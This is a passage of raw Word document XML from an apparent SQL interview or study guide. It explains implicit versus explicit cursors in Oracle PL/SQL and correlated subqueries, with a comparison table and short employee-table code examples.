          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="737" w:name="_Toc196308217"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>D</w:t>
      </w:r>
      <w:r w:rsidR="00356F93" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>ifference between implicit cursor and explicit cursor</w:t>
      </w:r>
      <w:r w:rsidR="00205C15" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="737"/>
    </w:p>
    <w:p w14:paraId="5C19C3B1" w14:textId="6EB31B9F" w:rsidR="00BD197A" w:rsidRPr="005C1C9E" w:rsidRDefault="00BD197A" w:rsidP="005C1C9E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Here is a concise comparison between </w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>implicit cursor</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>explicit cursor</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in SQ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7"/>
        <w:gridCol w:w="4803"/>
        <w:gridCol w:w="3814"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BD197A" w:rsidRPr="005C1C9E" w14:paraId="100AA74A" w14:textId="77777777" w:rsidTr="00BD197A">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="637551BD"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Feature</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="26CDA3D7"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Implicit Cursor</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3A134353"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plicit Cursor</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BD197A" w:rsidRPr="005C1C9E" w14:paraId="1B4E9B10" w14:textId="77777777" w:rsidTr="00BD197A">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="03C0771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Definition</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="09A5391F"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Automatically created by Oracle for DML operations (INSERT, UPDATE, DELETE, SELECT INTO)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="228D2198"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Manually defined by the programmer for queries returning multiple rows</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BD197A" w:rsidRPr="005C1C9E" w14:paraId="3559BB2F" w14:textId="77777777" w:rsidTr="00BD197A">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="319F7C4C"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Control</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4E702E0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Not under user control</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="40A281C8"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Full control (open, fetch, close)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BD197A" w:rsidRPr="005C1C9E" w14:paraId="658BEBF1" w14:textId="77777777" w:rsidTr="00BD197A">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4E6ED8A2"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lastRenderedPageBreak/>
              <w:t>Declaration Required?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0D79A189"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No</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0E36C0B7"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Yes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BD197A" w:rsidRPr="005C1C9E" w14:paraId="644853C1" w14:textId="77777777" w:rsidTr="00BD197A">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="43E776FC"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Best Used For</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="21CC73BF"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Single-row operations</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3B8123D4"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Multiple-row operations</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BD197A" w:rsidRPr="005C1C9E" w14:paraId="1135F529" w14:textId="77777777" w:rsidTr="00BD197A">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="45C207DA"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Access via Attributes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3FB40FE3"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FOUND, %NOTFOUND, %ROWCOUNT, %ISOPEN (e.g., SQL%ROWCOUNT)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="79D23B32"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FOUND, %NOTFOUND, %ROWCOUNT, %ISOPEN (on cursor name)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BD197A" w:rsidRPr="005C1C9E" w14:paraId="3F3FB905" w14:textId="77777777" w:rsidTr="00BD197A">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5E0AF372"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Example Use Case</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="652A362D"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SELECT salary INTO v_salary FROM employees WHERE emp_id = 101;</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1F6D4D6B"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Iterate over employees in Finance department</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0AA9C2AC" w14:textId="77777777" w:rsidR="00BD197A" w:rsidRPr="005C1C9E" w:rsidRDefault="00BD197A" w:rsidP="005C1C9E">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>🔹</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D9DE96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Implicit Cursor:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E0FA847"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BEGIN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59B76470"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UPDATE employee SET salary = salary + 1000 WHERE department = 'HR';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B9502D0"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DBMS_OUTPUT.PUT_LINE('Rows updated: ' || SQL%ROWCOUNT);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E99D581"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END;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EA09E1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Explicit Cursor:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72DDA53B"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DECLARE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C18B05C"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CURSOR emp_cursor IS SELECT emp_id, emp_name FROM employee WHERE department = 'HR';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A3290DE"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v_id employee.emp_id%TYPE;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20EC4727"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v_name employee.emp_name%TYPE;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="237266FB"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BEGIN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76E56D6B"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OPEN emp_cursor;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AA3919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LOOP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5015211A"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FETCH emp_cursor INTO v_id, v_name;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55A3B4B7"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EXIT WHEN emp_cursor%NOTFOUND;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0458BB42"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DBMS_OUTPUT.PUT_LINE('ID: ' || v_id || ', Name: ' || v_name);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B14803B"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END LOOP;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C884C8C"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CLOSE emp_cursor;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53ED6D07" w14:textId="77777777" w:rsidR="00BD197A" w:rsidRPr="00CE4B95" w:rsidRDefault="00BD197A" w:rsidP="005C1C9E">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>END;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73E30BFE" w14:textId="2DF40F66"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09F598D0">
          <v:rect id="_x0000_i3033" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DCEE4F0" w14:textId="29A58C44" w:rsidR="00205C15" w:rsidRPr="00CE4B95" w:rsidRDefault="00356F93">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="738" w:name="_Toc196308218"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is a correlated subquery</w:t>
      </w:r>
      <w:r w:rsidR="00205C15" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="738"/>
    </w:p>
    <w:p w14:paraId="4E6EB14A" w14:textId="60C9B284" w:rsidR="00BD197A" w:rsidRPr="005C1C9E" w:rsidRDefault="00BD197A" w:rsidP="005C1C9E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">A </w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>correlated subquery</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a type of subquery where the inner query (the subquery) refers to columns from the outer query. The subquery is executed once for each row processed by the outer query. The results of the subquery depend on the outer query's row values, making it "correlated" with the outer query.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07944225"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Key Points:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DBA4C3F"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The </w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>subquery</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> refers to columns from the </w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>outer query</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F0BFFAD"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The subquery is evaluated </w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>for each row</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in the outer query.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A5C742E"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The subquery can return a single value or a set of values, but it's evaluated repeatedly for every row of the outer query.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67E1C480"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yntax:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B3C60C1"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SELECT column1, column2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3658A86D"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FROM outer_table outer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02422F0C"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WHERE outer.column1 = (SELECT inner.column1 FROM inner_table inner WHERE inner.column2 = outer.column2);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4013A3D8"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ample:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C81700F"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Suppose we have two tables:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CB4D115"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Employees</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FC5E01A" w14:textId="77777777" w:rsidR="00BD197A" w:rsidRPr="005C1C9E" w:rsidRDefault="00BD197A"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emp_id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45333E9B" w14:textId="77777777" w:rsidR="00BD197A" w:rsidRPr="005C1C9E" w:rsidRDefault="00BD197A"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emp_name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59F58F22" w14:textId="77777777" w:rsidR="00BD197A" w:rsidRPr="005C1C9E" w:rsidRDefault="00BD197A"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salary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C80E87D" w14:textId="77777777" w:rsidR="00BD197A" w:rsidRPr="005C1C9E" w:rsidRDefault="00BD197A"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department_id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3863D4C8"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Departments</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68E6E089" w14:textId="77777777" w:rsidR="00BD197A" w:rsidRPr="005C1C9E" w:rsidRDefault="00BD197A"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department_id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C40C67A" w14:textId="77777777" w:rsidR="00BD197A" w:rsidRPr="005C1C9E" w:rsidRDefault="00BD197A"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department_name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C0B26F0"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We want to find the employees whose salary is greater than the average salary of their respective department.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32E19F54"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Correlated Subquery:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14AA20B3"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lastRenderedPageBreak/>
        <w:t>SELECT emp_name, salary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DB53BEE"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FROM Employees e</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CC90F8D"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WHERE salary &gt; (</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="186651E4"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SELECT AVG(salary)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28605E1D"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FROM Employees</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1407408D"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WHERE department_id = e.department_id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="754415AB"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50004704"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planation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35B15512"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The outer query selects employees from the Employees table.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F196D9A"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The inner query calculates the </w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>average salary</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for each department (e.department_id).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D8E938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The inner query is </w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>correlated</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> because it references e.department_id from the outer query.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21BE48C8"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For each row in the outer query, the inner query is executed to get the average salary for that employee’s department.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BFAF6FA"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Advantages:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05E191E4"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Dynamic comparisons</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: It allows dynamic comparisons based on the outer query's values.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39A68CBA"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Flexible</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Useful for row-by-row evaluations and comparisons.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BD574D9" w14:textId="32DD7D26"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66F07C4D">
          <v:rect id="_x0000_i3034" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1607A82E" w14:textId="68A6C00E" w:rsidR="00380657" w:rsidRPr="00CE4B95" w:rsidRDefault="00356F93">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="739" w:name="_Toc196308219"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is the left outer join</w:t>
      </w:r>
      <w:r w:rsidR="00380657" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="739"/>
    </w:p>
    <w:p w14:paraId="45024E31" w14:textId="23162424" w:rsidR="00BD197A" w:rsidRPr="005C1C9E" w:rsidRDefault="00BD197A" w:rsidP="005C1C9E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
